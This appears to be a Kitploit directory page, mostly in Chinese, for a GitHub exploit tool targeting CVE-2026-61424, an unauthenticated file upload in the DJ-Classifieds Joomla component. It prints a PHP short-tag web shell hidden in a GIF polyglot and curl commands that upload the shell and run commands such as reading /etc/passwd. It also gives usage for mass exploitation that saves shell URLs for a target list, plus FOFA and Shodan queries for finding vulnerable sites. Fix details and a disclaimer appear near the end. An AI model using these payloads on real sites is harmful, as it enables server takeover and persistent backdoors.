Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-61424 — DJ-Classifieds Joomla 组件未认证文件上传 RCE。通过 PHP 短标签绕过 3-string 过滤器。CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2 | Kitploit
工具/GitHubGitHub/shinthink/cve-2026-61424
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试错误配置红队远程访问工具
GitHubshinthink/cve-2026-61424

CVE-2026-61424

DJ-Classifieds Joomla 组件未认证文件上传 RCE。通过 PHP 短标签绕过 3-string 过滤器。CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2

查看仓库
1132个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Python CVE CVSS License

CVE-2026-61424 — DJ-Classifieds <= 3.11.1

imageupload 任务 → 无认证 → 3字符串过滤器绕过(

概述

DJ-Classifieds(Joomla 扩展)存在未授权任意文件上传漏洞。imageupload 任务端点在无身份验证的情况下处理文件上传,并依赖一个3字符串黑名单(<?php、eval(、base64),该黑名单可通过 PHP 短开标签(<?=)轻松绕过。结合 GIF 多语言(polyglot)文件,上传的文件能通过所有图像校验,同时包含功能完整的 PHP WebShell。

字段详情
CVECVE-2026-61424
产品DJ-Classifieds(DJ-Extensions 开发的 Joomla 扩展)
CVSS 4.010.0(严重)
类型CWE-434 — 无限制文件上传
发现者Phil Taylor / mySites.guru — 2026年7月16日
利用情况在披露之前已确认存在在野利用

受影响版本

状态版本
受影响1.0 — 3.11.1
已修复3.11.2(2026年7月20日)

漏洞机制

根本原因

administrator/components/com_djclassifieds/lib/djupload.php 中的 upload() 方法被映射到 imageupload 任务,但没有身份验证检查,也没有 CSRF 令牌验证。

// administrator/components/com_djclassifieds/lib/djupload.php
// imageupload task → upload() method

// MISSING: JFactory::getUser() auth check
// MISSING: JSession::checkToken() CSRF check

$name     = $_REQUEST['name'] ?? $_REQUEST['filename'] ?? '';
$raw_body = file_get_contents('php://input');

// ... writes file to tmp/djupload/<name>

安全过滤器为何失效(3字符串绕过)

内容扫描器仅拦截三个字面字符串:

// The ONLY malicious-content check in the entire upload handler:
if (preg_match('/<\?php|eval\(|base64/i', $fileContent)) {
    die('Malicious file detected');
}

这会拦截 <?php、eval( 和 base64 — 但不会拦截 PHP 短开标签:

<?=system($_GET['c']);?>     ← 0/3 blocked strings → PASSES

自 PHP 5.4 起,PHP 短回显标签(<?=)已默认启用。

攻击流程

  1. 构造一个多语言(polyglot)文件:有效的 GIF89a 文件头 + <?=system($_GET['c']);?>
  2. 向 index.php?option=com_djclassifieds&task=imageupload 发送 POST 请求,携带 name=shell.gif
  3. 服务器检查:.gif 扩展名 ✓ getimagesize() ✓ 无 <?php/eval(/base64 ✓
  4. 文件保存至 tmp/djupload/<shell>.gif
  5. 访问:https://target.com/tmp/djupload/shell.gif?c=id

已验证的源文件

文件作用
administrator/components/com_djclassifieds/lib/djupload.phpupload() 方法 — 无认证,3字符串过滤器
components/com_djclassifieds/controller.php将 imageupload 任务路由到 upload()
administrator/components/com_djclassifieds/djclassifieds.xml通过 <version> 标签泄露版本信息

服务器日志证据

披露前在野观察到的匿名扫描器探测:

POST /index.php?option=com_djclassifieds&task=imageupload
  name=<random>.gif  filename=<random>.gif
  — no cookie, no session, no referer

安装

git clone https://github.com/shinthink/CVE-2026-61424.git
cd CVE-2026-61424
pip install -r requirements.txt

使用方法

单个目标

python cve_2026_61424.py -t target.com

批量利用

python cve_2026_61424.py -f targets.txt -o shells.txt

参数

参数说明默认值
-t, --target单个目标主机—
-f, --file目标列表文件(每行一个,# 为注释)—
-o, --output将 RCE URL 保存至文件—
--threads批量模式的线程数30
--no-cleanupRCE 后不删除后门False
--debug调试输出False

概念验证

单个目标

$ python cve_2026_61424.py -t target.com

  Host         : target.com
  DJ-Classifieds: YES v3.11.1
  Upload       : YES
  RCE          : YES
  Shell        : https://target.com/tmp/djupload/img_abc123.gif
  Output       : DJ-SHELL-OK Linux ... uid=33(www-data) gid=33(www-data) ...
  Time         : 2.1s

手动利用

# Step 1 — Upload polyglot shell
curl -sk -X POST \
  "https://target.com/index.php?option=com_djclassifieds&task=imageupload&name=shell.gif&filename=shell.gif" \
  -H "Content-Type: image/gif" \
  --data-binary @polyglot.gif

# Step 2 — Verify RCE
curl -sk "https://target.com/tmp/djupload/shell.gif?c=id;hostname;uname+-a"

# Step 3 — Execute arbitrary commands
curl -sk "https://target.com/tmp/djupload/shell.gif?c=cat%20/etc/passwd"

FOFA / Shodan

# DJ-Classifieds component
body="com_djclassifieds"

# Version disclosure (XML manifest)
body="DJ-Classifieds" && body="<version>"

# Exposed djupload directory
body="Index of" && body="djupload"

# Shodan
http.html:"com_djclassifieds" http.component:"Joomla"

修复方案(3.11.2)

  1. 新增 Joomla 身份验证 — 在 upload() 前执行 JFactory::getUser() 访客检查
  2. 新增 CSRF 令牌验证 — 对 imageupload 任务执行 JSession::checkToken()
  3. 限制文件类型 — 服务端仅允许图片白名单(jpg、jpeg、png、gif)
  4. 改进内容扫描 — 在 3字符串黑名单之外增加额外的 PHP 模式检测

影响

  • 完全远程代码执行(RCE) — 以 Web 服务器用户身份执行任意命令
  • 持久化访问 — 后门将一直保留,直到被手动删除或目录被清理
  • 内容滥用 — 在可信域名上上传和托管任意文件
  • 磁盘耗尽 — 具备匿名批量上传能力
  • 链式攻击 — 该多语言图片可被站点其他位置的 LFI 漏洞包含利用

免责声明

本工具仅供教育和授权安全测试使用。请仅针对您拥有或已获得明确测试许可的系统使用。作者对误用或造成的任何损害不承担任何责任。


参考链接

资源链接
IONIX 威胁中心ionix.io/threat-center/cve-2026-61424
mySites.guru 发现公告mysites.guru/blog/dj-classifieds-unauthenticated-file-upload
DJ-Extensions 安全版本发布dj-extensions.com/blog/general/dj-classifieds-3-11-2-security-release
CVE.org 记录cve.org/CVERecord?id=CVE-2026-61424
INCIBE-CERTincibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2026-61424

与 DJ-Extensions 或 mySites.guru 无关联。

下载工具